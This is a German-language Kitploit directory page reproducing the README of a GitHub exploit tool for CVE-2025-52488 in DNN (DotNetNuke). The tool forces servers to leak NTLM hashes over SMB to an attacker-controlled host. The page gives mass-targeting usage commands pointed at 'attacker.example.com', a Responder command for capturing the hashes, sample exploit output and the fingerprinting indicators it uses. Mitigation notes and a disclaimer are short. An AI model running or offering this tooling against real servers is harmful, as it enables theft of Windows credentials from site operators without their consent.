Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-52488 — Dieser Exploit nutzt eine Schwachstelle in DNN (früher DotNetNuke) in den Versionen 6.0.0 bis vor 10.0.1 aus, die es Angreifern ermöglicht, NTLM-Hashes durch Angriffe auf die Unicode-Pfadnormalisierung offenzulegen. | Kitploit
Tools/GitHubGitHub/sh4den/cve-2025-52488
AufklärungPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffung
GitHubsh4den/cve-2025-52488

CVE-2025-52488

Dieser Exploit nutzt eine Schwachstelle in DNN (früher DotNetNuke) in den Versionen 6.0.0 bis vor 10.0.1 aus, die es Angreifern ermöglicht, NTLM-Hashes durch Angriffe auf die Unicode-Pfadnormalisierung offenzulegen.

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DNN Unicode-Pfadnormalisierung NTLM-Hash-Offenlegung Exploit (CVE-2025-52488)

Überblick

Dieser Exploit zielt auf eine Schwachstelle in DNN (ehemals DotNetNuke) Versionen 6.0.0 bis vor 10.0.1 ab, die es Angreifern ermöglicht, NTLM-Hashes durch Unicode-Pfadnormalisierungsangriffe offenzulegen.

Schwachstellendetails

  • CVE-ID: CVE-2025-52488
  • Schweregrad: Hoch (CVSS 8.6)
  • Betroffene Versionen: 6.0.0 bis vor 10.0.1
  • Angriffsvektor: Netzwerk
  • Authentifizierung: Nicht erforderlich

So funktioniert es

Der Exploit nutzt Windows/.NET-Eigenheiten und Unicode-Normalisierung aus, um den Ziel-DNN-Server dazu zu zwingen, SMB-Anfragen an einen vom Angreifer kontrollierten Server zu senden, wodurch möglicherweise NTLM-Hashes während des Authentifizierungsprozesses offengelegt werden.

Voraussetzungen

  1. Python 3.7+
  2. Erforderliche Pakete (Installation mit pip install -r requirements.txt)
  3. SMB-Server zum Erfassen von NTLM-Hashes (z. B. Responder, Burp Collaborator)

Verwendung

Grundlegende Verwendung

root@kitploit:~
python main.py targets.txt attacker.example.com

Mit benutzerdefinierten Parametern

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

Argumente

  • targets: Datei mit einer Liste von DNN-Hosts (einer pro Zeile)
  • smb_server: Hostname/IP des SMB-Servers zum Erfassen von NTLM-Hashes
  • -t, --threads: Anzahl gleichzeitiger Threads (Standard: 10)
  • --timeout: Anfrage-Timeout in Sekunden (Standard: 10)

Ziel-Dateiformat

Erstellen Sie eine Textdatei mit Ziel-URLs, eine pro Zeile:

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

Einrichtung des SMB-Servers

Sie können Tools wie Responder verwenden, um NTLM-Hashes zu erfassen:

root@kitploit:~
responder -I eth0 -wrf

Oder verwenden Sie Burp Collaborator für Out-of-Band-Erkennung.

Beispielausgabe

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

Erkennungsindikatoren

Der Exploit sucht nach den folgenden DNN-Indikatoren:

  • dnn_IsMobile-Cookie
  • dotnetnuke in der Antwort
  • dnnconnect in der Antwort
  • DNN Platform in der Antwort

Minderung

  • Aktualisieren Sie DNN auf Version 10.0.1 oder höher
  • Implementieren Sie Netzwerkebenen-Kontrollen, um SMB-Anfragen an externe Server zu verhindern
  • Überwachen Sie auf verdächtige Datei-Upload-Versuche

Haftungsausschluss

Dieses Tool dient nur zu Bildungs- und autorisierten Sicherheitstestzwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben.

Referenzen

  • CVE-2025-52488
  • Assetnote Research
Tool herunterladen